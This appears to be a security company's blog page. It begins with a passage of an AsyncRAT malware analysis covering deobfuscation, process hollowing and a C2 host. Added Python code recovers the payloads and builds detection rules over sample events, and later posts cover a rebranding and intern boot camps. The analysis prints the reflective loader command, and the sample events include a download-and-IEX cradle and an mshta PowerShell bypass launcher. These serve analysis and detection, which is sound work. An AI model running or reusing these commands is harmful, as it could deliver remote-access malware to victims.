After conversion, the bytes are stored in byte-array variables for use later in the script.

One peculiar note: the variable H5 appears to be defined twice with exactly the same payload, which is odd since the second definition changes nothing (see 1.9).

Finally, the last line performs the assembly execution, using the shellcodes and a variable called ali, which holds the path of aspnet_compiler.exe from the .NET Framework as a string.

To obtain the binaries from the shellcodes, we save them to files after the byte conversion and remove the last line of the script so that it is never executed.

1.9
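The recovery step just described (replace the junk pattern with 0, convert the restored string to bytes, write it to disk without ever executing it), as an added Python helper that is not code from the original post. A hex-string encoding of the shellcode is assumed; the junk token `@#`, the sample blob and the output file name are constructed for this example, and the real sample uses a different pattern. The MZ/PE check at the end is the quick sanity test an analyst wants before loading the file into ILSpy.

```python
"""Recover the embedded binaries from the obfuscated shellcode strings.

Added analysis helper, not code from the original post. The post describes
each shellcode as a string in which a junk pattern stands in for '0'; after
a find-and-replace the string is converted to bytes. A hex-string encoding
is assumed here, and JUNK_TOKEN, the sample blob and the output path are
constructed for this example (the real sample uses a different pattern).
"""
import struct
from typing import Optional

JUNK_TOKEN = "@#"  # constructed stand-in for the pattern seen in the sample


def deobfuscate_hex(obfuscated: str, token: str = JUNK_TOKEN) -> str:
    """Replace every junk token with '0' and drop whitespace left over from string concatenation."""
    return "".join(obfuscated.replace(token, "0").split())


def hex_to_bytes(hexstr: str) -> bytes:
    """Convert the restored hex string to bytes, refusing odd-length input."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string; the junk token was probably not fully removed")
    return bytes.fromhex(hexstr)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check before handing the file to ILSpy: MZ header plus a PE signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover(obfuscated: str, out_path: Optional[str] = None, token: str = JUNK_TOKEN) -> bytes:
    """Deobfuscate, convert and optionally write the binary to disk (never execute it)."""
    blob = hex_to_bytes(deobfuscate_hex(obfuscated, token))
    if out_path:
        with open(out_path, "wb") as fh:
            fh.write(blob)
    return blob


def build_obfuscated_sample() -> str:
    """Construct a minimal MZ/PE-shaped blob and obfuscate it the way the post describes."""
    blob = bytearray(b"MZ" + b"\x90" * (0x3C - 2))  # DOS header up to e_lfanew
    blob += struct.pack("<I", 0x40)                  # e_lfanew -> offset 0x40
    blob += b"PE\0\0" + b"\xcc" * 12                 # PE signature and filler
    return blob.hex().upper().replace("0", JUNK_TOKEN)


SAMPLE_OBFUSCATED = build_obfuscated_sample()  # constructed input, stands in for H5 / H6

if __name__ == "__main__":
    # H5 and H6 from the post would each be passed through recover() like this
    recovered = recover(SAMPLE_OBFUSCATED, "recovered_H5.bin")
    print(len(recovered), "bytes, PE header:", looks_like_pe(recovered))
```

Run each of the two shellcode strings through `recover()` separately; if `looks_like_pe()` returns False for either, the junk token or the encoding assumption is wrong and the output should not be trusted.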

By obtaining the files, we perform some initial analysis on them:

1.10

We will return to the .ps1 script shortly, since its last line is what runs these two binaries, but first we need to understand what is happening: H5 is the one that gets loaded for assembly execution.

By loading the H5 payload in ILSpy we are presented with the below:

1.11


From the set of WINAPI calls executed in screenshot 1.11, it is immediately clear that this is process hollowing injection, which makes perfect sense given that the last line passes aspnet_compiler.exe as the host process: it is started and then replaced in memory with the H6 binary, which is the actual malware.

The last command is:

[Reflection.Assembly]::Load($H5).GetType('VNPT.B').GetMethod('NET').Invoke($null,[object[]] ($ali,$H6))   

The H5 binary is loaded in memory and its method NET on the type VNPT.B is invoked with aspnet_compiler.exe and the H6 binary as parameters, as shown in screenshot 1.12.

1.12

Next, let’s have a look at what the actual malware can do.

The H6 binary is obfuscated and uses key-based encryption, has multiple evasion features against debuggers and VMs (shown in screenshot 1.13), and performs reconnaissance of the host, such as its hostname and installed AV product (shown in screenshot 1.14).


1.13

1.14

Screenshot 1.15 shows some of its features, and screenshot 1.16 shows persistence through a scheduled task triggered at logon that executes a .bat file.


1.15
1.16

The malware attempts to reach its C2 domain fat7e114.ddns.net on port 6666, but also contacts the windowsupdate.com domain, possibly to look legitimate, as observed in screenshot 1.17.

1.17
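From a detection standpoint, the chain walked through above (the WebClient download cradle piped to IEX, the .lnk launching a .bat from C:\Users\Public, mshta with vbscript:Execute, powershell -ExecutionPolicy Bypass running the dropped .ps1, aspnet_compiler.exe spawned as the hollowing host, logon-task persistence) and the C2 indicator fat7e114.ddns.net:6666 map onto a small set of telemetry rules. The following is an added Python example, not code from the original post, that encodes those stages as regexes and runs them over constructed Sysmon-style process-creation and network-connection lines. The key=value field names, the dropper file names dropper.bat and update.bat, and the exact schtasks command are assumptions; the post shows the scheduled task only in a screenshot.

```python
"""Detection rules for the AsyncRAT delivery chain described above.

Added example, not code from the original post. Each rule is a regex derived
from one stage the post describes; they run over constructed Sysmon-style
key=value event lines (EventID=1 process creation, EventID=3 network
connection). Field names, the dropper file names and the exact scheduled-task
command are assumptions.
"""
import re
from typing import List, Tuple

RULES: List[Tuple[str, str]] = [
    # stage 1: VBS launches PowerShell with a WebClient cradle piped to IEX
    ("download_cradle_in_memory",
     r"DownloadString\s*\(.*?\)\s*\|\s*(IEX|Invoke-Expression)"),
    # stage 2: the .lnk shortcut runs a .bat dropped in the world-writable Public folder
    ("lnk_launches_bat_in_public",
     r"\sImage=C:\\Windows\\System32\\cmd\.exe.*CommandLine=.*C:\\Users\\Public\\[^\s]+\.bat"),
    # stage 3: the .bat runs mshta with an inline vbscript:Execute handler
    ("mshta_vbscript_execute",
     r"mshta(\.exe)?\b.*vbscript:Execute"),
    # stage 4: PowerShell runs the dropped .ps1 with the execution policy bypassed
    # (\s* also catches the glued "-ExecutionPolicyBypass" spelling)
    ("powershell_bypass_from_public",
     r"powershell(\.exe)?\b.*-ExecutionPolicy\s*Bypass.*C:\\Users\\Public\\[^\s]+\.ps1"),
    # stage 5: aspnet_compiler.exe spawned by PowerShell as the process-hollowing host
    ("aspnet_compiler_child_of_powershell",
     r"ParentImage=[^\s]*powershell\.exe.*\sImage=[^\s]*aspnet_compiler\.exe"),
    # persistence: logon-triggered scheduled task running a .bat (command shape assumed)
    ("logon_task_runs_bat",
     r"schtasks(\.exe)?\b.*/sc\s+onlogon.*\.bat"),
    # C2: the hardcoded dynamic-DNS host and port named in the post
    ("asyncrat_c2_beacon",
     r"DestinationHostname=fat7e114\.ddns\.net|DestinationPort=6666"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]

# Constructed Sysmon-like events reproducing the chain, plus one benign line.
SAMPLE_EVENTS = [
    r"EventID=1 ParentImage=C:\Windows\System32\wscript.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -Command (New-Object Net.WebClient).DownloadString('https://bit.ly/3wylsze')| IEX",
    r"EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c C:\Users\Public\dropper.bat",
    r'EventID=1 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\mshta.exe CommandLine=mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -ExecutionPolicy Bypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1"",0:close")',
    r"EventID=1 ParentImage=C:\Windows\System32\mshta.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -ExecutionPolicy Bypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1",
    r"EventID=1 ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe CommandLine=aspnet_compiler.exe",
    r"EventID=1 ParentImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Image=C:\Windows\System32\schtasks.exe CommandLine=schtasks /create /sc onlogon /tn Update /tr C:\Users\Public\update.bat",
    r"EventID=3 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe DestinationHostname=fat7e114.ddns.net DestinationPort=6666",
    r"EventID=1 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -NoProfile -Command Get-Service",
]


def scan(events) -> List[Tuple[int, str]]:
    """Return (1-based line number, rule name) for every rule that fires on every line."""
    hits = []
    for lineno, event in enumerate(events, start=1):
        for name, rx in COMPILED:
            if rx.search(event):
                hits.append((lineno, name))
    return hits


def chain_coverage(events) -> List[str]:
    """Distinct chain stages observed, in rule order; several stages on one host
    within a short window is a far stronger signal than any single rule."""
    seen = {name for _, name in scan(events)}
    return [name for name, _ in RULES if name in seen]


if __name__ == "__main__":
    for lineno, name in scan(SAMPLE_EVENTS):
        print(f"line {lineno}: {name}")
    print("stages observed:", len(chain_coverage(SAMPLE_EVENTS)), "of", len(RULES))
```

The individual rules are intentionally narrow (a path under C:\Users\Public, a specific parent/child pair) to keep noise down; the benign admin PowerShell line in the sample fires nothing. Correlating hits per host via `chain_coverage()` is what turns these into a confident alert.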

In conclusion, and consistent with public resources, the H6 binary is AsyncRAT.


- Blog post by Thanasis (trickster0) of Telspace Systems

A new era for Telspace


As Telspace celebrates its 20th anniversary of being in business, I consider myself lucky to have been the Founder and CEO of such an incredible company. 

Being CEO and Founder, it’s always been a key goal of mine to give back to the community at large and more specifically the South African community. It’s not as easy to do so when you’re starting a business alone especially at 19 years old, with no experience (and no capital at all!), but we’ve always tried to do our part over the years. It’s been a pleasure to watch the South African community grow in the last 2 decades, seeing the difference between 2002 and 2022 is staggering for me. 

Throughout all the ups and downs of running a business over the last 2 decades, giving back to the community by growing it within South Africa has brought me the most joy. Watching people that started their careers with us knowing very little go on to exceptional jobs at large (or small) corporate firms gives me a lot of happiness. The same goes for our internship programmes and the other free community initiatives for information security education that we have run over the years.

With the above being said, it is also why we, as management, have decided to change the business and rebrand to Telspace Africa. Our rebranding and new leadership changes are in line with our new strategy to set the foundation for the next 20 years of Telspace Africa with a stronger and clearer focus on the African market.

It therefore gives me great pride to announce that Dr Manuel Corregedor will now be the Chief Executive Officer of Telspace Africa. Anyone that has met and knows Manuel well, will attest to what an incredible person he is. Particularly, a person of high integrity and character. In addition, he’s been a great friend to me, a mentor to countless students and staff, a phenomenal colleague, and his contributions to the information security sector in SA (and abroad) have been significant and are largely unmatched (except for a select few others in our country). I’m proud to not only know Manuel as a best friend, but also now have him as our CEO. Congratulations Manuel, you truly deserve it.

In line with our management change, Timothy Quintal has been promoted to Chief Operating Officer. Timothy (like Manuel) is an exceptionally strong leader, a strategic and critical thinker and has a strong focus on developing others. Timothy exudes positivity and has a strong focus on growing each individual at our company. Also, someone I’m proud to call a great friend.

We’ve also had other internal staff promotions in management positions internally, all with the best intentions for our staff and customers.

Lastly, my new role at Telspace Africa as Chairman is to oversee and steer the company in the right direction and to serve on our board in the best possible way, encouraging growth not only for our company but, again, in our community.

Thank you to all our customers and staff that have believed in us over the years, we look forward to serving you for the next 20 years and beyond.

-Dino Covotsos



Boot Camp: 2022


Telspace Africa has kicked off its 2022 Boot Camp program with a fresh intake of interns. After approximately 60 grueling interviews, 3 candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!

They are already knee-deep in the Boot Camp, having completed several modules of the boot camp already!



We asked them for some feedback on their experience so far:

“The Telspace internship for me is fast paced, healthy work environment as an intern and needs you to always be on your toes. Whether you make mistakes or get it right first try, you keep pushing further” – Obakeng

“It involves tons of research and problem-solving. One moment, I am on top of the world as I would pwn the machines and the next, I am back to my sorrows. I still love it though” – Tswaitswai

“It has been an unbelievable experience so far. I have not only had the opportunity to expand my knowledge so vastly in such a short time but I have been afforded the opportunity to get to know and see first-hand what some of the country’s top security experts can do, which only adds to the excitement and motivation to become a part of this great team” - Jason

For those interested in entering the industry, we will be hosting more boot camps in the near future. If you would like to participate, please get in touch with us at recruitment@telspace.africa

In order to prepare yourself, the interview process covers some of the following topics: Networking, Linux, Windows, Cryptography, general information security knowledge, as well as Software Development and Exploitation. We are certain that our Boot Camp surpasses the industry “standard” thanks to the following:

  • Our interns don’t have any monetary restraint attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there are no restraints where the interns will have to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Having an approach other than this would not benefit our newcomers to the industry, nor the community at large.
  • If interns are uncertain that they are a good fit for the industry or at Telspace Africa during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).
  • Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways, then they will be offered a 4-month contract as a junior analyst with Telspace Africa (which they are not obliged to accept). If they do accept the offer, then further certifications and training will be provided by Telspace.
  • This boot camp is about growing the information security community, and thereafter, our company; in order to provide our customers with the best possible service.

Telspace wishes each new intern the very best of luck; we are eager to see the wonderful knowledge you will gain, as well as the many shells you will be popping!


Boot Camp: 2023


We kicked off our 2023 Boot Camp programme with a fresh intake of interns in July 2023. After approximately 50 grueling interviews, 6 candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!

They are already knee-deep in the Boot Camp, having already completed several modules of the boot camp within their first month!




We asked them for some feedback on their experience so far:

"The Telspace internship offers a dynamic and healthy work environment . It involves research, problem-solving, and exposure to top security experts, providing an incredible learning experience and motivation to be part of the team" - Sifundo

"My experience in the bootcamp thus far has been challenging but very insightful. I've learned a lot in a very short time thanks to a welcoming, understanding and highly knowledgeable team." - Nathan 

"I am in the hacker's realm. What more can I ask for? The learning experience has been great. The organisational culture is fantastic, and I plan to make the most of this golden opportunity." - Jacky

"The bootcamp has been challenging, but I am learning a lot about penetration testing." - Muhammad

"Through steep learning curves, we thrived; together yet independent. Laughter fortified us, and as one, we safeguard both each other and a better tomorrow" - Shane

For those interested in entering the industry, we regularly host boot camps. If you would like to participate in our next boot camp, please get in touch with us at recruitment@telspace.africa

In order to prepare yourself, the interview process covers some of the following topics: Networking, Linux, Windows, Cryptography, general information security knowledge, as well as Software Development and Exploitation. We are certain that our Boot Camp surpasses the industry “standard” thanks to the following:

  • Our interns don’t have any monetary restraint attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there are no restraints where the interns will have to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Having an approach other than this would not benefit our newcomers to the industry, nor the community at large.
  • If interns are uncertain that they are a good fit for the industry or at Telspace Africa during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).
  • Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways, then they will be offered a 4-month contract as a junior analyst with Telspace Africa (which they are not obliged to accept). If they do accept the offer, then further certifications and training will be provided by Telspace.
  • This boot camp is about growing the information security community, and thereafter, our company; in order to provide our customers with the best possible service.

Telspace wishes each new intern the very best of luck; we are eager to see the wonderful knowledge you will gain, as well as the many shells you will be popping!



Transformative Journey: My Experience at the Telspace Bootcamp

My journey through the world of cybersecurity has been a series of remarkable milestones, all of which led me to the life-changing Telspace Bootcamp experience. It all began with a triumphant win at the ITWeb Security Summit Hackathon. This victory not only marked my entry into the Telspace Bootcamp but also set the stage for my journey of growth and achievement. In this blog post, I will delve into my enriching experience at the Telspace Bootcamp, from its commencement on July 3rd, 2023, to its conclusion on August 31st, 2023, and the certifications that crowned my journey.

From Hackathon to Bootcamp: A Dream Come True

Back in June 2023, I had the opportunity of a lifetime – participating in the ITWeb Security Summit Hackathon, which Telspace sponsors every year. The event took place at the prestigious Sandton Convention Centre, where cybersecurity enthusiasts and experts gathered to showcase their skills. I was determined to prove myself in the Red Teaming Capture the Flag (CTF) competition that was built by the Telspace Team. I was so thrilled to have emerged as the winner of the ITWeb Security Summit Hackathon 2023. It was an incredible journey, and I was grateful for the opportunity to showcase my skills in identifying vulnerabilities and proposing innovative solutions.

Upon winning the hackathon I received an invitation to the Telspace Bootcamp - this was a dream come true. This bootcamp was renowned for its rigorous and comprehensive training program. It promised to not only equip me with the necessary skills but also immerse me in the practicalities of the cybersecurity world.

A Dynamic Learning Environment

From day one, the Telspace Bootcamp proved to be a dynamic and immersive learning environment. The curriculum covered an extensive range of cybersecurity topics, from the fundamentals to advanced techniques. The instructors were not just educators; they were experienced professionals who shared their real-world insights and experiences. This made the learning experience both enriching and practical.

The Bootcamp programme included, but was not limited to:
  • Hardware hacking
  • Hands on Hacking Fundamentals
  • Enterprise Infrastructure Hacking
  • Web Application Hacking
  • Mobile Application Pen testing
  • Hacking APIs
  • Academy All-Access Membership from TCM Security

Hands-on Practical Exercises

One of the hallmarks of the Telspace Bootcamp was its emphasis on hands-on practical exercises. We were not just learning theoretical concepts; we were applying them in simulated environments. These exercises ranged from ethical hacking and penetration testing challenges, to network security simulations. They were designed to prepare us for the real challenges faced by cybersecurity professionals.

At Telspace, one of the most valuable lessons I learned was the stark contrast to many other courses/internships/bootcamps that often inundate students with tools and concepts that rarely find practical application in the real-world scenarios; instead, Telspace was a refreshing departure from the norm, steadfastly focusing on those tools and topics proven to be indispensable for success as an ethical hacker, a deliberate approach that reflected the bootcamps' commitment to providing an education deeply rooted in practicality and real-world relevance, with an incredibly immersive, hands-on structure that not only demystified but also meticulously covered a multitude of foundational topics, effectively equipping me with the knowledge and skills that I knew would truly empower me in the field.

Mentorship and Guidance

Throughout the duration of the bootcamp, the invaluable mentorship we received played an instrumental role in shaping our development and enhancing our learning experience, as our dedicated mentors consistently organised and conducted live sessions, thereby affording us the exceptional opportunity to acquire knowledge and seek clarification through the asking of questions, with notable examples including live demonstrations illustrating the intricate processes of hacking a mobile application and the jailbreaking of an iPhone. This highly personalised approach employed by our mentors proved to be a pivotal factor in my educational journey, enabling me to surmount obstacles and gain a profound understanding of complex concepts.

Earning the PJPT Certification with "Early Adopter" Badge

One of the most significant milestones during my tenure at the Telspace Bootcamp was achieving the PJPT (Practical Junior Penetration Tester) certification. This achievement, earned on July 27th, 2023, not only validated my learnings in penetration testing and ethical hacking but also came with the prestigious "early adopter" badge. This badge symbolised my dedication and commitment to staying at the forefront of cybersecurity knowledge, as I am part of the first 100 to obtain this certificate.

From the TCM Security website:

"This exam assesses a student’s ability to perform an internal network penetration test at an associate level. Students will have two (2) full days to complete the assessment and an additional two (2) days to write a professional report.

In order to receive the certification, a student must:

Leverage their Active Directory exploitation skillsets to perform lateral and vertical network movements, and ultimately compromise the exam Domain Controller. Also, provide a detailed, professionally written report."


Conquering the PNPT Certification

As my journey continued, I reached another pinnacle on August 26th, 2023, by attaining the PNPT (Practical Network Penetration Tester) certification. This certification further solidified my learnings in network security and bolstered my credentials on my journey to becoming a cybersecurity professional.


PNPT Advice

Due to NDA, I am unable to discuss specifics regarding the test, however I can offer the following guidance to anyone preparing to take the PNPT exam:

Finish these 5 recommended courses:

  • Practical Ethical Hacking (PEH) course
  • Windows Privilege Escalation (WPE) course
  • Open-Source Intelligence (OSINT) course
  • External Pentest Playbook (EPP) course
  • Linux Privilege Escalation (LPE) course

Conclusion: A Journey of Transformation

My experience at the Telspace Bootcamp was not just a training program; it was a journey of transformation. It honed my skills, expanded my knowledge, and prepared me for the challenges of the cybersecurity field. I am immensely grateful for the mentorship, hands-on experience, and the certifications that have propelled me forward. This journey is just the beginning, and I look forward to the exciting opportunities and challenges that lie ahead in the ever-evolving world of cybersecurity.

- Blog Post by Sifundo Ngubane



